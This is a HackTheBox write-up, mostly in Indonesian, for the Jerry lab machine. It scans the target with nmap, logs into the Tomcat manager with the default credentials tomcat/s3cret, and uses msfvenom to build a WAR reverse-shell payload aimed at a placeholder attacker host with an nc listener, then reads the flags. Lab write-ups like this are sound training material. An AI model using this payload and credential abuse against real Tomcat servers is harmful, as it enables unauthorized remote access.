HackTheBox Machine : Jerry Write Up
Although Jerry is one of the easier machines on Hack The Box, it is realistic as Apache Tomcat is often found exposed and configured with common or weak credentials.
Seperti biasa pertama lakukan port scanning.
❯ nmap -sC -sV -T3 10.10.10.95 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-02 00:17 WIB
Nmap scan report for 10.10.10.95
Host is up (0.066s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.57 seconds
Dari hasil port scanning, kita dapatkan informasi bahwa hanya ada 1 port yang terbuka yaitu port 8080 dengan service Apache Tomcat versi 7.0.88.
Ketika button ‘Manager App’ diklik akan meminta username dan password seperti gambar di bawah ini.
Dan apabila memasukkan kredensial yang salah maka membuka page /manager/html seperti berikut.
Dari /manager/html kita dapatkan kredensial user. Username : tomcat
Password : s3cret
Login kembali dengan kredensial di atas maka akan terbuka page berikut
Dari sini, kita ketahui bahwasanya web ini menerima .WAR file, WAR file (Web Application Resource atau Web application ARchive) merupakan sebuah file yang digunakan untuk mendistribusikan kumpulan JAR-files, JavaServer Pages, Java Servlets, Java classes, XML files, tag libraries, static web pages (HTML dan sejenisnya) ke dalam suatu web.
Untuk exploitnya, bisa kita ikuti Hacktricks, bisa menggunakan metasploit atau manual dengan msfvenom, kali ini saya akan menggunakan msfvenom agar sekalian belajar. Jangan lupa sesuaikan LHOST dan LPORT sesuai dengan IP dan Port listenernya. IPnya bisa dilihat dengan command ip a di bagian tun0 dan portnya bebas.
Berikut command msfvenomnya untuk menghasilkan revshell.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war
Setelah itu jalankan listener dengan command nc -lvnp <port>
sesuaikan port dengan port listenernya, lalu upload file revshell.war pada menu deploy di /manager/html tadi, setelah berhasil terupload akan seperti ini,
Buka tabnya dan listener akan mendapatkan koneksi.
Setelah itu cari lokasi flag user.txt dan root.txt.
cd ..\Users\Administrator\Dekstop\flags
Di dalam folder flags terdapat file yang bernama 2 for the price of 1.txt, untuk printnya bisa gunakan command type seperti gambar di bawah
Dan voila kita dapatkan flag user dan rootnya.